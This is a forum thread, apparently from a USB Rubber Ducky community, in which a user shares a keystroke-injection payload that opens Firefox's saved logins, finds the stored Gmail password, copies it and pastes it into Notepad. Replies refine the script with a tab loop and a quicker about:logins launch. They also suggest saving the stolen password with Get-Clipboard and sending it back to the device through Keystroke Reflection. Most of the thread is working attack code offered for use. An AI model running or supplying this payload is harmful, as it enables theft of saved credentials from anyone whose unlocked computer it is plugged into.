Different results with Caps Lock key on and off

HoodedSoldier

Not sure if this is where I'm suppose to place this.  But like the Title says.  If I leave the caps lock key on the payload works like I want it to so far but if I turn off the caps key it does not tab properly.  If this is the wrong location please point me to the right forum and yes I do have the latest Ducky with the USB C.

REM My first payload
REM HOODEDSOLDIER
REM COPY GMAIL PASSWORD INTO NOTEPAD
DELAY 3000
GUI r
DELAY 500
STRING firefox
DELAY 1000
ENTER
DELAY 1000
STRING about:preferences#privacy
ENTER
DELAY 500
STRING password
DELAY 1000
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
ENTER
DELAY 1000
STRING gmail
DELAY 300
ENTER
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
DELAY 300
ENTER
DELAY 1000
CTRL W
DELAY 1000
CTRL W
DELAY 500
GUI r
DELAY 500
STRING notepad
DELAY 600
ENTER
DELAY 1000
CTRL V

Thanks Root.  I was going to ask what did this piece of code do but I realized it's turning off the caps.  But it didn't fix the issue.  In lowercase the script stops tabbing over before it gets to "Saved Logins."  It's actually stopping after 6 tabs instead of the 9 I have in the script.  Funny when I actually tab it's 8 but for some reason 9 tabs does the trick but that's another problem.  I do appreciate the help though.

Not that it probably will change anything regarding your observed CAPS issues, but you might be able to handle the repeated tabs in another way. Perhaps not making the number of lines that much smaller but it's nice to use some of the Ducky Script 3.0 features as well as open up for easier management of the code since you don't need to change a lot of lines if doing some code editing. The counter might need some tweaking, but you'll find out when testing the payload.

DEFINE TABDELAY 250
VAR $TAB_CNTR = 11
WHILE ( $TAB_CNTR > 0 )
    TAB
    DELAY TABDELAY
    $TAB_CNTR = ( $TAB_CNTR - 1 )
END_WHILE

I might also mention that in addition to what @dark_pyrrorecommended re: about:logins vs about:preferences#privacy — you could speed up the script a bit more by replacing your initial Run dialog line with:

GUI r
DELAY 500
STRINGLN firefox about:logins

This will open Firefox to the logins page with the search field active, so from there you can go straight to typing in your target. I also notice that tabbing to the password COPY button takes 11 tab keystrokes, while `SHIFT TAB` only takes 9 — at least on mine. Something to consider.

You guys are dope! I appreciate the responses and help.  @dark_pyrro I don't think I'm there yet with the code you provided.  Over my head.  I'm sure it works but I wouldn't understand how it works yet so don't want to use it just yet. Thanks @Darren Kitchen for that extra piece.  I'm going to try it out now.  Been working on the script right now actually. Looks like with the latest update pushed out to PayLoad Studio has fixed the issue with the caps lock for now.  Thanks again guys!

Also, not sure how far you wanna take this demo Firefox password nabbing payload — but I realize you could use the powershell command Get-Clipboard to save the contents (password) to a file, then use a snippet from the Keystroke Reflection example to transmit it back to the USB Rubber Ducky.

Further reading

1 hour ago, Darren Kitchen said:

Also, not sure how far you wanna take this demo Firefox password nabbing payload — but I realize you could use the powershell command Get-Clipboard to save the contents (password) to a file, then use a snippet from the Keystroke Reflection example to transmit it back to the USB Rubber Ducky.

Further reading

Now this is what I was looking for last night.  I was trying to figure out how to save the file to the drive but couldn't for the life of me find a solution.  I'll give it a try later today and report back.  Appreciate the help!

Archived